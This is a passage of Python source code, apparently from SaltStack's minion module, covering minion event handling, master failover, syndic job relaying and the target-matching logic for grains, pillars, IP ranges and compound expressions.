tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug('Connected to master {0}'.format(data['schedule'].split(master_event(type='alive', master=''))[1]))
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug('Updating auth data for {0}: {1} -> {2}'.format(
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']))
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace('Broadcast message received not for this minion, Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event {0}'.format(mtag)) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
